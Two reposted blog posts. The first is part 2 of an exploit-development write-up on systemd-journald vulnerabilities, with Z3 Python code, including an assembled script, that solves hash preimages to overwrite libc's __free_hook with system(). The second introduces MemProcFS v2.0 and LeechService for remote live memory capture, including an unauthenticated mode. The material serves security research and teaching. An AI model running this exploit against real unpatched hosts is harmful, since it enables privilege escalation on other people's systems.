Exploiting systemd-journald Part 2

February 6, 2019 By Nick Gregory

Introduction

This is the second part in a multipart series on exploiting two vulnerabilities in systemd-journald, which were published by Qualys on January 9th. In the first post, we covered how to communicate with journald, and built a simple proof-of-concept to exploit the vulnerability, using predefined constants for fixed addresses (with ASLR disabled). In this post, we explore how to compute the hash preimages necessary to write a controlled value into libc's __free_hook as described in part one. This is an important step in bypassing ASLR, as the address of the target location to which we redirect execution (which is system in our case) changes between instances of systemd-journald. Consequently, successful exploitation in the presence of ASLR requires computing a hash preimage dynamically to correspond with the respective address space of that instance of systemd-journald. How to disclose the location of system, and writing an exploit to completely bypass ASLR, are beyond the scope of this post.

The Challenge

As noted in the first blog post, we don't directly control the data written to the stack after it has been lowered into libc's memory - the actual values written are the result of hashing our journal entries with jenkins_hashlittle2. Since this is a function pointer we're overwriting, we must have full 64-bit control of the hash output, which can seem like a very daunting task at first, and would indeed be impractical if a cryptographically secure hash were used. However, jenkins_hashlittle2 is not cryptographically secure, and we can use this property to generate preimages for any 64-bit output in just a few seconds.

The Solution

We can use a tool like Z3 to build a mathematical definition of the hash function and automatically generate an input which satisfies certain constraints (like the output being the address of system, and the input being constrained to the valid entry format).

Z3

Z3 is a theorem prover which gives us the ability to (among other things) easily model and solve logical constraints. Let's take a look at how to use it by going through an example in the Z3 repo. In this example, we want to find whether there exists an assignment for variables x and y so that the following conditions hold:

x + y > 5
x > 1
y > 1

It is clear that more than one solution exists for the above set of constraints. Z3 will inform us if the set of constraints has a solution (is satisfiable), as well as provide one assignment to our variables that demonstrates satisfiability. Let's see how:

from z3 import *

x = Real('x')
y = Real('y')
s = Solver()
s.add(x + y > 5, x > 1, y > 1)
print(s.check())
print(s.model())

This simple example shows how to create variables (e.g. Real('x')), add the constraints that x + y > 5, x > 1, and y > 1 (s.add(x + y > 5, x > 1, y > 1)), check if the given state is satisfiable (i.e. there are values for x and y that satisfy all constraints), and get a set of values for x and y that satisfy the constraints. As expected, running this example yields:

sat
[y = 4, x = 2]

meaning that the stated formula is satisfiable, and that y = 4, x = 2 is a solution that satisfies the equation.

BitVectors

Not only can Z3 represent arbitrary real numbers, but it can also represent fixed-width integers called BitVectors.
We can use these to model some more interesting elements of low-level computing, like integer wraparound:

from z3 import *

x = BitVec('x', 32)  # Create a 32-bit wide variable, x
y = BitVec('y', 32)
s = Solver()
s.add(x > 0, y > 0, x + y < 0)  # Constrain x and y to be positive, but their sum to be negative
print(s.check())
print(s.model())

A few small notes here:

- Adding two BitVecs of a certain size yields another BitVec of the same size.
- Comparisons made by using < and > in Python result in signed comparisons being added to the solver constraints. Unsigned comparisons can be made using Z3-provided functions.

And as we'd expect:

sat
[y = 2147451006, x = 2147451006]

BitVecs give us a very nice way to represent the primitive C types, such as the ones we will need to model the hash function in order to create our preimages.

Transformations

Being able to solve simple equations is great, but in general we will want to reason about more complex operations involving variables. Z3's Python bindings allow us to do this in an intuitive way. For instance (drawing from this Wikipedia example), if we want to find a fixed point of the equation f(x) = x^2 - 3x + 4, we can simply write:

def f(x):
    return x**2 - 3*x + 4

x = Real('x')
s = Solver()
s.add(f(x) == x)
s.check()
s.model()

This yields the expected result:

sat
x = 2

Lastly, it's worth noting that Z3's Python bindings provide pretty-printing for expressions. So if we print out f(x) in the above example, we get a nicely formatted representation of what f(x) is symbolically:

x**2 - 3*x + 4

This just scratches the surface of what you can do with Z3, but it's enough for us to begin using Z3 to model jenkins_hashlittle2, and to create preimages for it.

Modeling The Hash Function

Input

As noted above, all BitVectors in Z3 have a fixed size, and this is where we run into our first issue. Our hash function, jenkins_hashlittle2, takes a variable-length array of input, which can't be modeled with a fixed-length BitVec. So we first need to decide how long our input is going to be. Looking through the hash function's source, we see that it chunks its input into 3 uint32_ts at a time, and operates on those. If this is a hash function that uniformly distributes its output, those 12 bytes of input should be enough to cover the 8-byte output space (i.e. all possible 8-byte outputs should be generated by one or more 12-byte inputs), so we should be able to use 12 bytes as our input length. This also has the benefit of never calling the hash's internal state-mixing function, which greatly reduces the complexity of the equations.

length = 12
target = 0x7ffff7a33440  # The address of system() on our ASLR-disabled system

s = Solver()
key = BitVec('key', 8*length)

Input Constraints

Our input (key) has to satisfy several constraints. Namely, it must be a valid journald native entry. As we saw in part one, this means it should resemble "ENTRY_NAME=ENTRY_VALUE". However, there are some constraints on ENTRY_NAME that must be taken into account (as checked by the journal_field_valid function): the name must be less than 64 characters, must start with [A-Z], and must only contain [A-Z0-9_]. The ENTRY_VALUE has no constraints besides not containing a newline character, however. To minimize the total number of constraints Z3 has to solve, we chose to hard-code the entry format in our model as one uppercase character for the entry name, an equals sign, and then 10 ASCII-printable characters above the control-character range for the entry value.
To specify this in Z3, we will use the Extract function, which allows us to select slices of a BitVector, such that we can apply constraints to each slice. Extract takes three arguments: the high bit, the low bit, and the BitVector to extract from.

char = Extract(7, 0, key)
s.add(char >= ord('A'), char <= ord('Z'))  # First character must be uppercase

char = Extract(15, 8, key)
s.add(char == ord('='))  # Second character must be '='

for char_offset in range(16, 8*length, 8):
    char = Extract(char_offset + 7, char_offset, key)
    s.add(char >= 0x20, char <= 0x7e)  # Subsequent characters must just be in the printable range

Note: Z3's Extract function is very un-Pythonic. It takes the high bit first (inclusive), then the low bit (inclusive), then the source BitVec to extract from. So Extract(7, 0, key) extracts the first byte from key.

The Function Itself

Now that we have our input created and constrained, we can model the function itself. First, we create our Z3 instance of the internal state variables uint32_t a, b, c using the BitVecVal class (which is just a way of creating a BitVec of the specified length with a predetermined value). The predetermined value is the same as in the hashing function, which is the constant 0xdeadbeef plus the length:

initial_value = 0xdeadbeef + length
a = BitVecVal(initial_value, 32)
b = BitVecVal(initial_value, 32)
c = BitVecVal(initial_value, 32)

Note: The *pc component of the initialization will always be 0, as it's initialized to 0 in the hash64() function, which is what's actually called on our input.

We can ignore the alignment checks the hash function does (as we aren't actually dereferencing anything in Z3). We can also skip past the while (length > 12) loop and start in the case 12 branch, as our length is hard-coded to be 12. Thus the first bit of code we need to implement is from inside the switch block on the length, at case 12, which adds the three parts of the key to a, b, and c:

a += Extract(31, 0, key)
b += Extract(63, 32, key)
c += Extract(95, 64, key)

Since key is just a vector of bits from the perspective of Z3, in the above code we just Extract the first, second, and third uint32_t - there's no typecasting to do.

Following the C source, we next need to implement the final macro, which does the final state mixing to produce the hash output. Looking at the source, it uses another macro (rot), but this is just a simple rotate-left operation. Z3 has rotate-left as a primitive function, so we can make our lives easy by adding an import to our Python:

from z3 import RotateLeft as rot

And then we can simply paste in the macro definition verbatim (well, minus the line-continuation characters):

c ^= b; c -= rot(b, 14)
a ^= c; a -= rot(c, 11)
b ^= a; b -= rot(a, 25)
c ^= b; c -= rot(b, 16)
a ^= c; a -= rot(c, 4)
b ^= a; b -= rot(a, 14)
c ^= b; c -= rot(b, 24)

At this point, the variables a, b, and c contain equations which represent their state when the hash function is about to return. From the source, hash64() combines the b and c out arguments to produce the final 64-bit hash.
So we can simply add constraints to our model to denote that b and c are equal to their respective halves of the 64-bit output we want:

s.add(b == (target & 0xffffffff))
s.add(c == (target >> 32))

All that's left at this point is to check the state for satisfiability:

s.check()

Get our actual preimage value from the model:

preimage = s.model()[key].as_long()

And transform it into a string:

input_str = preimage.to_bytes(12, byteorder='little').decode('ascii')

With that, our exploit from part 1 is now fully explained, and can be used on any system where the addresses of libc and the stack are constant (i.e. systems which have ASLR disabled).

Conclusion

Z3 is a very powerful toolkit that can be used to solve a number of problems in exploit development. This blog post has only scratched the surface of its capabilities, but as we've seen, even basic Z3 operations can be used to trivially solve complex problems.

Read Part One of this series

Sursa: https://capsule8.com/blog/exploiting-systemd-journald-part-2/
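For reference, the snippets from the post assemble into a single script - a sketch under the same assumptions the post makes (hard-coded 12-byte entry format, a fixed target address, and the z3 Python bindings):

from z3 import Solver, BitVec, BitVecVal, Extract, sat, RotateLeft as rot

length = 12
target = 0x7ffff7a33440  # address of system() with ASLR disabled

s = Solver()
key = BitVec('key', 8 * length)

# entry format: one uppercase character, '=', then 10 printable characters
char = Extract(7, 0, key)
s.add(char >= ord('A'), char <= ord('Z'))
char = Extract(15, 8, key)
s.add(char == ord('='))
for off in range(16, 8 * length, 8):
    char = Extract(off + 7, off, key)
    s.add(char >= 0x20, char <= 0x7e)

# internal state, initialized as in jenkins_hashlittle2 via hash64()
initial_value = 0xdeadbeef + length
a = BitVecVal(initial_value, 32)
b = BitVecVal(initial_value, 32)
c = BitVecVal(initial_value, 32)

# case 12: mix the three dwords of the key into the state
a += Extract(31, 0, key)
b += Extract(63, 32, key)
c += Extract(95, 64, key)

# the final() macro from the C source
c ^= b; c -= rot(b, 14)
a ^= c; a -= rot(c, 11)
b ^= a; b -= rot(a, 25)
c ^= b; c -= rot(b, 16)
a ^= c; a -= rot(c, 4)
b ^= a; b -= rot(a, 14)
c ^= b; c -= rot(b, 24)

# pin the two output halves to the target address
s.add(b == (target & 0xffffffff))
s.add(c == (target >> 32))

if s.check() == sat:
    preimage = s.model()[key].as_long()
    print(preimage.to_bytes(length, byteorder='little').decode('ascii'))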
-
Wednesday, February 6, 2019

Remote LIVE Memory Analysis with The Memory Process File System v2.0

This blog entry aims to give an introduction to The Memory Process File System and show how easy it is to do high-performance memory analysis, even of live remote systems over the network. This and much more is presented in my BlueHatIL 2019 talk on February 6th.

Connect to a remote system over the network over a Kerberos-secured connection. Acquire only the live memory you require to do your analysis/forensics - even over medium-latency/bandwidth connections. An easy-to-understand file system user interface, combined with continuous background refreshes made possible by the multi-threaded analysis core, provides an interesting new way of performing incident response by live memory analysis.

Analyzing and dumping remote live memory with the Memory Process File System.

The image above shows the user starting MemProcFS.exe with a connection to the remote computer book-test.ad.frizk.net and with the DumpIt live memory acquisition method. It is then possible to analyze live memory simply by clicking around in the file system. Dumping the physical memory is done by copying the pmem file in the root folder.

Background

The Memory Process File System was released for PCILeech in March 2018, supporting 64-bit Windows, and was used to find the Total Meltdown / CVE-2018-1038 page table permission bit vulnerability in the Windows 7 kernel. People have also used it to cheat in games - primarily cs:go - via the PCILeech API.

The Memory Process File System was released as a stand-alone project focusing exclusively on memory analysis in November 2018. The initial release included both APIs and plugins for C/C++ and Python. Support was added soon thereafter for 32-bit memory models, and Windows support was expanded as far back as Windows XP.

What is new?

Version 2.0 of The Memory Process File System marks a major release, published in conjunction with the BlueHatIL 2019 talk Practical Uses for Hardware-assisted Memory Visualization. New functionality includes:

- A new separate physical memory acquisition library - the LeechCore.
- Live memory acquisition with DumpIt or WinPMEM.
- Remote memory capture via a remotely running LeechService.
- Support for Microsoft crash dumps and Hyper-V save files.
- Full multi-threaded support in the memory analysis library.
- Major performance optimizations.

The combination of live memory capture via Comae DumpIt (or the less stable WinPMEM) and secure remote access may be interesting both for convenience and for incident response. It even works remarkably well over medium-latency and medium-bandwidth connections.

The LeechCore library

The LeechCore library, focusing exclusively on memory acquisition, is released as a standalone open-source project as part of The Memory Process File System v2 release. The LeechCore library abstracts memory acquisition from analysis, making things more modular and easier to re-use. The library supports multiple memory acquisition methods, such as:

- Hardware: USB3380, PCILeech FPGA and iLO
- Live memory: Comae DumpIt and WinPMEM
- Dump files: raw memory dump files, full crash dump files and Hyper-V save files

The LeechCore library also allows for transparently connecting to a remote LeechService running on a remote system over a compressed, mutually authenticated RPC connection secured by Kerberos. Once connected, any of the supported memory acquisition methods may be used.
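Because the analysis view is just a file system, it can also be consumed from scripts. A minimal sketch, assuming MemProcFS/Dokany has mounted the view at the default M: drive and that physical memory is exposed as the pmem file in the root folder as described above (the mount point and exact file name are assumptions here):

import os
import shutil

MOUNT = "M:\\"  # assumed default MemProcFS mount point

# enumerate the top-level view (per-process directories, pmem, etc.)
for entry in sorted(os.listdir(MOUNT)):
    print(entry)

# acquire a full physical memory image by copying the pmem file from the root
shutil.copyfile(os.path.join(MOUNT, "pmem"), "C:\\temp\\physmem.raw")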
The LeechService

The LeechService may be installed as a service with the command LeechSvc.exe install. Make sure all necessary dependencies are in the folder of leechsvc.exe - i.e. leechcore.dll and winpmem_x64.sys (if using WinPMEM). The LeechService will write an entry containing the Kerberos SPN to the application event log once started, provided that the computer is part of an Active Directory domain.

The LeechService is installed and started with the Kerberos SPN: book-test$@AD.FRIZK.NET

Now connect to the remote LeechService with The Memory Process File System - provided that port 28473 is open in the firewall. The connecting user must be an administrator on the system being analyzed. An event will also be logged for each successful connection. In the example below WinPMEM is used. Note that WinPMEM may be unstable on recent Windows 10 systems.

Securely connected to the remote system - acquiring and analyzing live memory.

It's also possible to start the LeechService in interactive mode. If starting it in interactive mode, it can be started with DumpIt to provide more stable memory acquisition. It may also be started in insecure no-security mode, which may be useful if the computer is not joined to an Active Directory domain.

Using DumpIt to start the LeechSvc in interactive insecure mode.

If started in insecure mode, everyone with access to port 28473 will be able to connect and capture live memory. No logs will be written. The insecure mode is not available in service mode. It is only recommended in secure environments in which the target computer is not domain-joined. Please also note that it is also possible to start the LeechService in interactive secure mode.

To connect to the example system from a remote system, specify:

MemProcFS.exe -device dumpit -remote rpc://insecure:<address_of_remote_system>

How do I try it out?

Both the Memory Process File System and the LeechService are 100% open source.

Download The Memory Process File System from GitHub - pre-built binaries are found in the files folder. Also follow the instructions to install the open-source Dokany file system.

Download the LeechService from GitHub - pre-built binaries with no external dependencies are found in the files folder.

Please also note that you may have to download Comae DumpIt or WinPMEM (latest release; install and copy the .sys driver file) to acquire live memory.

The Future

Please do keep in mind that this is a hobby project. Since I'm not working professionally with this, future updates may take time and are not guaranteed.

The Memory Process File System and the LeechCore are already somewhat mature, with their focus on fast, efficient, multi-threaded live memory acquisition and analysis, even though current functionality is somewhat limited. The plan for the near future is to add additional core functionality - such as page hashing and PFN database support. Page hashing will allow for more efficient remote memory acquisition and better forensics capabilities. PFN database support will strengthen virtual memory support in general.

Also, additional and more efficient analysis methods - primarily in the form of new plugins - will be added in the medium term. Support for additional operating systems, such as Linux and macOS, is a long-term goal. It shall however be noted that the LeechCore library is already supported on Linux.

Posted by Ulf Frisk at 2:35 PM

Sursa: http://blog.frizk.net/2019/02/remote-live-memory-analysis-with-memory.html
-